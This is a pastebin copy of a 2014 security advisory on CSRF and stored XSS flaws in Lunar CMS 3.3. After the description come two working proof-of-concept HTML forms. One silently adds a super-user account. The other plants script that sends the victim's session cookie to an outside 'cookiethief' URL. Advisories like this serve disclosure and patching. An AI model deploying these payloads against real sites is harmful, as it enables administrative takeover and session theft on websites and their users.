Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability

SUBMITTED BY: Guest

DATE: July 13, 2014, 2:40 a.m.

FORMAT: Text only

SIZE: 3.4 kB

Raw Download

HITS: 722

Report
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. 6
  7. 7
  8. 8
  9. 9
  10. 10
  11. 11
  12. 12
  13. 13
  14. 14
  15. 15
  16. 16
  17. 17
  18. 18
  19. 19
  20. 20
  21. 21
  22. 22
  23. 23
  24. 24
  25. 25
  26. 26
  27. 27
  28. 28
  29. 29
  30. 30
  31. 31
  32. 32
  33. 33
  34. 34
  35. 35
  36. 36
  37. 37
  38. 38
  39. 39
  40. 40
  41. 41
  42. 42
  43. 43
  44. 44
  45. 45
  46. 46
  47. 47
  48. 48
  49. 49
  50. 50
  51. 51
  52. 52
  53. 53
  54. 54
  55. 55
  56. 56
  57. 57
  58. 58
  59. 59
  60. 60
  61. 61
  62. 62
  63. 63
  64. 64
  65. 65
  66. 66
  67. 67
  68. 68
  69. 69
  70. 70
  71. 71
  72. 72
  73. 73
  74. 74
  75. 75
  76. 76
  77. 77
  78. 78
  79. 79
  80. 80
  81. 81
  82. 82
  83. 83
  84. <!--
  86. Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
  89. Vendor: Lunar CMS
  90. Product web page: http://www.lunarcms.com
  91. Affected version: 3.3
  93. Summary: Lunar CMS is a freely distributable open sourcecontent
  94. management system written for use on servers running the ever so
  95. popular PHP5 & MySQL.
  97. Desc: Lunar CMS suffers from a cross-site request forgery and a
  98. stored xss vulnerabilities. The application allows users to perform
  99. certain actions via HTTP requests without performing any validity
  100. checks to verify the requests. This can be exploited to perform
  101. certain actions with administrative privileges if a logged-in user
  102. visits a malicious web site. Input passed to the 'subject' and 'email'
  103. POST parameters thru the 'Contact Form' extension/module is not properly
  104. sanitised before being returned to the user. This can be exploited to
  105. execute arbitrary HTML and script code in a user's browser session in
  106. context of an affected site.
  108. Tested on: Apache/2.4.7 (Win32)
  109. PHP/5.5.6
  110. MySQL 5.6.14
  113. Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  114. @zeroscience
  117. Advisory ID: ZSL-2014-5188
  118. Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
  121. 11.06.2014
  123. -->
  127. CSRF Add Admin
  128. ===============
  130. <html>
  131. <body>
  132. <form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
  133. <input type="hidden" name="name" value="Hacker" />
  134. <input type="hidden" name="email" value="lab@zeroscience.mk" />
  135. <input type="hidden" name="password1" value="251ftw" />
  136. <input type="hidden" name="password2" value="251ftw" />
  137. <input type="hidden" name="access" value="0" />
  138. <input type="hidden" name="Submit" value="submit" />
  139. <input type="submit" value="Submit form" />
  140. </form>
  141. </body>
  142. </html>
  144. Access levels:
  146. 0: Super user
  147. 1: Admin
  148. 2: Website only
  152. CSRF Stored XSS (Session Hijack)
  153. =================================
  155. <html>
  156. <body>
  157. <form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
  158. <input type="hidden" name="email" value='"><script>alert(1);</script>' />
  159. <input type="hidden" name="error" value="2" />
  160. <input type="hidden" name="sent" value="1" />
  161. <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
  162. <input type="hidden" name="submit" value="submit" />
  163. <input type="submit" value="Submit form" />
  164. </form>
  165. </body>
  166. </html>
comments powered by Disqus